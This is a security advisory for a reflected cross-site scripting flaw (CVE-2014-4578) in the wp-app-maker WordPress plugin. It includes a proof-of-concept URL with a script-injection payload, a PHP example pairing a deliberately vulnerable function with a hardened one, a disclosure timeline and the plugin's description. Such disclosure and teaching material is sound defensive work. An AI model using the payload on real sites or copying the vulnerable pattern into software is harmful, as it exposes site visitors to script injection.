wp-plugin : wp-app-maker – A3-Cross-Site Scripting (XSS)

Plugin Details

Plugin Name : wp-app-maker

Affected Version : 1.0.16.4 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS) (OWASP Top 10 2013 category A3; reflected)

Identified by : Anant Shrivastava

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC - (Proof of Concept) :

http://localhost/wp-content/plugins/wp-app-maker/asset-studio/icons-launcher.php?uid=&<script>alert('xss');</script>

Vulnerable Parameter : uid

The script is reachable directly under wp-content/plugins/ and requires no login, nonce or other session state, so any visitor who follows the crafted link has the injected script executed in the WordPress site's origin.
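The page does not show the sink inside icons-launcher.php (note that the PoC places the script tag after the `&`, outside the uid value itself). The following is an added illustration, not the plugin's own code, of the general pattern behind an advisory like this: request input written into HTML without output encoding, next to a hardened version that validates the expected shape of `uid` and escapes for the attribute context. Function names and the output markup are assumptions; the sample requests are constructed.

```php
<?php
// Added example (not wp-app-maker source): reflected-XSS pattern vs. hardened form.

// Vulnerable pattern (assumed): the raw request parameter is concatenated into markup.
function render_launcher_vulnerable(array $get): string
{
    $uid = isset($get['uid']) ? (string) $get['uid'] : '';
    // Any '"', '<' or "'" in $uid lands in the page verbatim, so a value such as
    // "><script>alert('xss');</script> closes the attribute and runs as script.
    return '<img src="/asset-studio/icons/' . $uid . '.png" alt="launcher icon">';
}

// Hardened pattern: allow-list the value first, then encode for the HTML
// attribute context it is written into. Rejecting beats "cleaning".
function render_launcher_safe(array $get): string
{
    $uid = isset($get['uid']) ? (string) $get['uid'] : '';
    // An identifier should only ever be alphanumeric with '-' or '_'.
    // A real handler would also send HTTP 400 here.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $uid)) {
        return 'invalid uid';
    }
    // Contextual output encoding. Inside WordPress use esc_attr($uid);
    // outside it, htmlspecialchars with ENT_QUOTES covers both quote styles.
    $safe = htmlspecialchars($uid, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<img src="/asset-studio/icons/' . $safe . '.png" alt="launcher icon">';
}

// Constructed sample requests: a benign uid and an advisory-style payload.
$requests = [
    'benign'  => ['uid' => 'abc123'],
    'payload' => ['uid' => '"><script>alert(\'xss\');</script>'],
];

foreach ($requests as $label => $get) {
    echo "[$label] vulnerable: ", render_launcher_vulnerable($get), PHP_EOL;
    echo "[$label] hardened:   ", render_launcher_safe($get), PHP_EOL;
}
```

Run it with `php` from the command line: the vulnerable output for the `payload` request contains a live `<script>` element, while the hardened version rejects it outright (and would encode `<`, `>` and quotes even for a value that passed a looser allow-list). The same rule applies if the reflection point is the raw query string or request URI rather than the parsed `uid`: never write request-derived data into HTML without encoding for the exact context.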

Disclosure Timeline

Vendor Contacted : 2014-01-17

Plugin Status : Closed

Public Disclosure : 2014-06-04

CVE Number : CVE-2014-4578

Plugin Description :
WP App Maker lets you easily generate and start distributing an Android mobile app for WordPress just a few minutes after installing it.
It requires a user registration only in order to enable the cloud app generation service.

Here are some of its powerful features:

* Toolbar and text colors customization
* Launcher Icon generator
* Mobile Categories customization and filtering
* Widget for publishing your QRCode on the sidebar
* Usage tracking powered by Google Analytics (*)
* Monetization based on AdWhirl services (*)
* Images size optimization
* Fast caching engine for offline usage

(*) features available only for the PRO version.

More details are available on the official website:
[wpappmaker.com](http://wpappmaker.com "WP App Maker")

**The 5 minutes setup**
[youtube http://www.youtube.com/watch?v=V2U9WTLMUhc]

**Sample App**
[youtube http://www.youtube.com/watch?v=CjXGvD6XuCs]
